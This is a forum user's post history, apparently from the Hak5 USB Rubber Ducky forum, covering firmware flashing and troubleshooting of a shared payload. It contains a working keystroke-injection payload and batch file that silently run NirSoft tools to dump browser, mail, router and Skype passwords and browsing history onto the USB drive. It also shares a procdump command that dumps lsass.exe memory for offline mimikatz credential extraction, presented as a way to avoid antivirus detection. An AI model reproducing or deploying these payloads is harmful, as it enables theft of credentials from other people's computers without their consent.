odnorazovaya
-
Posts
13 -
Joined
-
Last visited
Posts posted by odnorazovaya
-
-
WOW! mimikatz is amazing! I'm surprised this isn't more widely known. EVeryone is so busy worrying about cracking windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to trying to brute force WPA keys. IT just spits it out in plaintext!
I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead?
I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here.
sounds promicing , looking forward to see it in action.
-
C:\Users\My_Username>for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"')
do (set DUCKYdrive=%A:)
'diskpart' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\My_Username>set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
C:\Users\My_Username>%DUCKYdrive%\launch.bat
The system cannot find the path specified.
C:\Users\My_Username>Used the same c_duck_v2_S002 firmware, could only test it on Win 7 64 Ultimate, dont have any other machine around at the moment. Seems like it's having some issues executing diskpart this time.
-
Here is what I have come up with. I am using the googleknowsbest script, as I am a fan of scripts that run on all Windows environments. I also added logic to contain all the output in a folder called MrGraysRubberHacks so the root of my duck is not all crowded. I have also observed something, when the loop is engaged in the command prompt, there is a sizable delay, but the command prompt appears to have a buffer that catches any subsequent keystrokes, so there is no problem with the execution of the script.
ENCODE: DEFAULT_DELAY 25 REM File: MrGraysRubberHacks.txt REM Target: WINDOWS VISTA/7 DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 150 STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER STRING %DUCKYdrive%\launch.bat ENTER LAUNCH.BAT file: for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txtIf you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items:
ENCODE: ... STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER ...
LAUNCH.BAT file: ... REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ...
getting my hands on it now, will let you know how it went after testing this on couple PC's. thanks for your time and effort.
-
If you all are still having errors, post what operating system you are using, and what firmware you have installed. I cannot make bricks without clay.
our bad,.
i have rested on 2 machines
win 7 64 - ultimate
win7 32 - proffesional.
on win7 32 pro - it gave me a slighttly different error, just saying that path isnt found. the error i have posted is from win7 64- ultimate.
as per your suggestion i have flashed to c_duck_v2_S002(haven't tried any other) , waited until it said that DUCKY(WHATEVER DRIVE:)
is mounted, an triggered the payload. the same result over and over. googleknowsbest's version gives the same error. thanks
-
Yes your doing the right thing.
There used to be a website called www.usbrubberducky.com (full of ducky resources) - it got owned, now the URL redirects to these forums.
oh, ok, got it.
-
Make sure you have the right firmware installed, I would recommend c_duck_v2_s002.hex from https://code.google.com/p/ducky-decode/ on the download page. This firmware if installed correctly will launch the payload when the ducky trigger is pressed. Wait for the removable media to mount to the computer, then launch the payload. If the removable media is not mounted when the payload is launched, it will not execute correctly.
C:\Users\MY_User>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%
d
'wmic' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\MY_User>%myd%\launch.bat
The system cannot find the path specified.
this the actual error im getting...
-
When I try and run it I always get "The system can not find the path specified". I tried changing Launch.bat to Launch.exe and still the same problem. What am I doing wrong?
same here. tried both overwraith's and googleknowsbest's versions. getting the same error over and over. please, any suggestions anyone?
-
thanks for your answer, i got it working without a single issue.
-
Should not really matter, are you having problems?
Duck Programming vanished with usbrubberducky.com, people were asking so I made the original available.
i wanted to make surei am doing the right thing before facing ones(problems). what do you mean by:" Duck Programming vanished with usbrubberducky.com"?
thanks for your response btw
-
Did a clean install today on Windows7, XP should work in a similar manner.
Installed Flip.
Inserted Ducky (in dfu-mode, continually hold the ducky's button as you insert the ducky, if its not in dfu-mode - you were not pushing the button, and you can not flash the ducky)
Performed Manual Driver install (see pics)
Worked perfectly - I didnt have to modify/copy any additional binaries or environment variables
If this doesnt work, you might have a dead-duck. My advise would be to contact the hak5 shop (shop@hak5.org) for an exchange.
hi, would you please help me with my question bove? thanks.
-
i would really appreciate your answers guys.
-
This guide is for re-flashing/upgrading the rubberducky firmware using WINDOWS XP x86 (should be the same for Vista, Windows 7+)
Installation Media
http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip
Flip download link: http://www.atmel.com/tools/FLIP.aspx
- also download the preferred firmware.hex from the duck wiki site before hand.
in here http://code.google.com/p/ducky-decode/
You may also need Microsoft Visual C++ Redistributable:
x86 - http://www.microsoft.com/en-gb/download/deails.aspx?id=5555
x64 - http://www.microsoft.com/en-gb/download/details.aspx?id=14632
Installation
- Install MS Visual C++ Redistributable
- Unzip DuckProgramming.zip
- Install Flip
- Install Atmel signed Driver
Atmel Driver Problems
You will have to install this manually! Windows installs the wrong driver!
So to install manually use the add hardware wizard and select have disk and scroll down to at32ucb.
Alternatively, make sure the Duck is in DFU-mode (keep pushing the button upon insertion), and goto Device Manager.
- Then look for a DFU-xxx under USB Devices
- Right Click
- Update Driver
- Then Manually specify driver.
- And point the program to the Atmel Signed Drivers from the unzipped DuckProgramming.zip
Running Program.bat to Re-flash Ducky
- open dos cmd prompt
- in cmd prompt type in cd C:\Program Files\Atmel\Flip 3.4.2\bin
- in the same cmd prompt type in
program.bat YourNewFirmware.hex
Its a sucess if it all says pass
Dont worry about the overlap warning!
hi everyone,
first time flashing in here. though it seems like an easy noob friendly guide, i'm still a bit confused about one part. Duck Programming.zip contained a file JRE_Flip_Installer_3.4.2.exe. And you also posted a link for a Flip installer download , which i followed and downloaded a version Flip Installer - 3.4.7.112.exe since i already have JRE installed. so when you say Install Flip, which file were you referring to, the one from download link, or the one from the zip? would you please clarify this for me. I'm running win 7 ultimate 64.
thanks
[Payload]: Mr Gray's Password, History recovery tool for Rubber Ducky
in Classic USB Rubber Ducky
Posted